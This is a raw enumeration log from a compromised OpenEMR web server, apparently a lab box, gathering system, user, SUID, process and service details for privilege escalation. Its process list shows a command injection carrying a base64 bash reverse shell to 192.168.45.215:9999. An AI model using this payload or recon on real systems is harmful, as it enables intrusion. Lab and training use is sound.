System/Kernel
www-data@APEX:/var/www/openemr/interface/main$ file /bin/bash ; uname -a ; cat /etc/*release
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped
Linux APEX 4.15.0-143-generic #147-Ubuntu SMP Wed Apr 14 16:10:11 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.5 LTS"
NAME="Ubuntu"
VERSION="18.04.5 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.5 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
64-bit
Ubuntu 18.04.5 LTS (Bionic Beaver)
4.15.0-143-generic
Networks
www-data@APEX:/var/www/openemr/interface/main$ ip route ; arp -a
default via 192.168.196.254 dev ens192 proto static
192.168.196.0/24 dev ens192 proto kernel scope link src 192.168.196.145
_gateway (192.168.196.254) at 00:50:56:9e:fc:4d [ether] on ens192
www-data@APEX:/var/www/openemr/interface/main$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 141 192.168.196.145:55688 192.168.45.215:9999 ESTABLISHED 3102/bash
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 192.168.196.255:137 0.0.0.0:* -
udp 0 0 192.168.196.145:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 192.168.196.255:138 0.0.0.0:* -
udp 0 0 192.168.196.145:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
0.0.0.0:22
Users & Groups
www-data@APEX:/var/www/openemr/interface/main$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
white:x:1000:1000::/home/white:/bin/sh
total 12K
4.0K drwxr-xr-x 2 white white 4.0K May 17 2021 white
4.0K drwxr-xr-x 3 root root 4.0K May 17 2021 .
4.0K drwxr-xr-x 23 root root 4.0K May 17 2021 ..
white
www-data@APEX:/var/www/openemr/interface/main$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=110(pollinate) gid=1(daemon) groups=1(daemon)
uid=111(mysql) gid=115(mysql) groups=115(mysql)
uid=1000(white) gid=1000(white) groups=1000(white)
SUIDs
www-data@APEX:/var/www/openemr/interface/main$ find / -perm -04000 -ls -type f 2>/dev/null
267552 100 -rwsr-xr-x 1 root root 100760 Nov 22 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
262636 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
792461 112 -rwsr-xr-x 1 root root 113528 Feb 2 2021 /usr/lib/snapd/snap-confine
266445 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
262569 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
277605 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
265285 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
265282 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
263817 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
265284 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
277604 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
265430 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
262423 148 -rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
265281 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
275555 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
266192 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
266190 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
265155 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
262177 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
265209 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
265207 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
SGIDs
www-data@APEX:/var/www/openemr/interface/main$ find / -type f -perm -02000 -ls 2>/dev/null
409436 12 -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
276916 44 -rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
266374 356 -rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
275510 16 -rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
265280 72 -rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
262311 40 -rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
265283 24 -rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
263772 32 -rwxr-sr-x 1 root tty 30800 Sep 16 2020 /usr/bin/wall
277119 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
524296 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/pam_extrausers_chkpwd
524315 36 -rwxr-sr-x 1 root shadow 34816 Jul 21 2020 /sbin/unix_chkpwd
Processes
www-data@APEX:/var/www/openemr/interface/main$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.8 159604 8632 ? Ss 17:31 0:01 /sbin/init
root 502 0.0 0.8 94672 8728 ? S<s 17:31 0:00 /lib/systemd/systemd-journald
root 517 0.0 0.1 97716 1744 ? Ss 17:31 0:00 /sbin/lvmetad -f
root 528 0.0 0.5 47216 5636 ? Ss 17:31 0:00 /lib/systemd/systemd-udevd
systemd+ 621 0.0 0.2 215520 2864 ? Ssl 17:31 0:00 /lib/systemd/systemd-timesyncd
systemd+ 676 0.0 0.4 70496 4676 ? Ss 17:31 0:00 /lib/systemd/systemd-resolved
root 739 0.0 0.9 91164 10032 ? Ss 17:31 0:00 /usr/bin/VGAuthService
root 741 0.0 0.6 227056 6720 ? S<sl 17:31 0:06 /usr/bin/vmtoolsd
root 750 0.0 0.1 604848 1816 ? Ssl 17:31 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
daemon 752 0.0 0.2 28340 2160 ? Ss 17:31 0:00 /usr/sbin/atd -f
root 756 0.0 0.2 31328 2548 ? Ss 17:31 0:00 /usr/sbin/cron -f
syslog 759 0.0 0.4 263044 4576 ? Ssl 17:31 0:00 /usr/sbin/rsyslogd -n
root 760 0.0 0.5 61996 5524 ? Ss 17:31 0:00 /lib/systemd/systemd-logind
root 761 0.0 0.6 287552 6144 ? Ssl 17:31 0:00 /usr/lib/accountsservice/accounts-daemon
message+ 764 0.0 0.4 50056 4148 ? Ss 17:31 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 806 0.0 1.5 170400 15564 ? Ssl 17:31 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 815 0.0 1.7 187128 18128 ? Ssl 17:31 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 832 0.0 0.6 288888 6320 ? Ssl 17:31 0:00 /usr/lib/policykit-1/polkitd --no-debug
mysql 1009 0.1 14.2 717740 143996 ? Ssl 17:31 0:15 /usr/sbin/mysqld
root 1228 0.0 1.0 265360 10120 ? Ss 17:33 0:00 /usr/sbin/nmbd --foreground --no-process-group
root 1277 0.0 0.5 72308 5480 ? Ss 17:33 0:00 /usr/sbin/sshd -D
root 1302 0.0 0.1 16188 1576 tty1 Ss+ 17:33 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1324 0.0 1.9 492324 20012 ? Ss 17:33 0:00 /usr/sbin/apache2 -k start
systemd+ 1666 0.0 0.3 71720 3476 ? Ss 17:34 0:00 /lib/systemd/systemd-networkd
root 1903 0.0 1.8 356708 18252 ? Ss 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1927 0.0 0.5 344956 5832 ? S 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1928 0.0 0.4 344980 4588 ? S 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
root 1943 0.0 0.6 356692 6596 ? S 17:34 0:00 /usr/sbin/smbd --foreground --no-process-group
www-data 2842 0.0 3.5 502236 35912 ? S 20:46 0:00 /usr/sbin/apache2 -k start
www-data 2933 0.0 2.9 498348 30256 ? S 20:46 0:00 /usr/sbin/apache2 -k start
www-data 2968 0.0 3.0 498252 31180 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2969 0.0 3.1 498288 31876 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2970 0.0 2.7 497708 27740 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2971 0.0 3.4 498428 34468 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2980 0.0 3.1 497736 31812 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2981 0.0 3.0 498188 30768 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2982 0.0 3.4 498224 34336 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 2985 0.0 3.3 498288 33464 ? S 20:47 0:00 /usr/sbin/apache2 -k start
www-data 3097 0.0 0.0 4636 848 ? S 21:10 0:00 sh -c faxstat -r -l -h || echo YmFzaCAtYyAiL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDUuMjE1Lzk5OTkgMD4mMSI=|base64 -d|bash
www-data 3100 0.0 0.1 18384 1916 ? S 21:10 0:00 bash
www-data 3101 0.0 0.1 18384 1924 ? S 21:10 0:00 bash -c /bin/bash -i >& /dev/tcp/192.168.45.215/9999 0>&1
www-data 3102 0.0 0.2 18516 2924 ? S 21:10 0:00 /bin/bash -i
www-data 3322 0.0 0.3 36708 3268 ? R 21:25 0:00 ps -auxwww
root 750 0.0 0.1 604848 1816 ? Ssl 17:31 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 756 0.0 0.2 31328 2548 ? Ss 17:31 0:00 /usr/sbin/cron -f
root 832 0.0 0.6 288888 6320 ? Ssl 17:31 0:00 /usr/lib/policykit-1/polkitd --no-debug
mysql 1009 0.1 14.2 717740 143996 ? Ssl 17:31 0:15 /usr/sbin/mysqld
Cron & Systemd
www-data@APEX:/var/www/openemr/interface/main$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Wed 2025-02-05 21:39:00 EST 11min left Wed 2025-02-05 21:09:02 EST 18min ago phpsessionclean.timer phpsessionclean.service
Wed 2025-02-05 22:22:49 EST 55min left Wed 2025-02-05 17:34:02 EST 3h 53min ago apt-daily.timer apt-daily.service
Thu 2025-02-06 03:04:00 EST 5h 36min left Wed 2025-02-05 17:33:59 EST 3h 53min ago ua-messaging.timer ua-messaging.service
Thu 2025-02-06 06:57:31 EST 9h left Wed 2025-02-05 17:34:03 EST 3h 53min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2025-02-06 08:17:57 EST 10h left Wed 2025-02-05 17:33:59 EST 3h 53min ago motd-news.timer motd-news.service
Thu 2025-02-06 17:47:02 EST 20h left Wed 2025-02-05 17:47:02 EST 3h 40min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2025-02-10 00:00:00 EST 4 days left Wed 2025-02-05 17:33:59 EST 3h 53min ago fstrim.timer fstrim.service
7 timers listed.
Pass --all to see loaded but inactive timers, too.
Services
www-data@APEX:/var/www/openemr/interface/main$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
apache2.service loaded active running The Apache HTTP Server
atd.service loaded active running Deferred execution scheduler
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
lxcfs.service loaded active running FUSE filesystem for LXC
mariadb.service loaded active running MariaDB 10.1.48 database server
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
nmbd.service loaded active running Samba NMB Daemon
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
smbd.service loaded active running Samba SMB Daemon
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
34 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
Sudo Version
www-data@APEX:/var/www/openemr/interface/main$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
Sudo version 1.8.21p2
Glibc Version
www-data@APEX:/var/www/openemr/interface/main$ ldd --version
ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
ldd (Ubuntu GLIBC 2.27-3ubuntu1.4) 2.27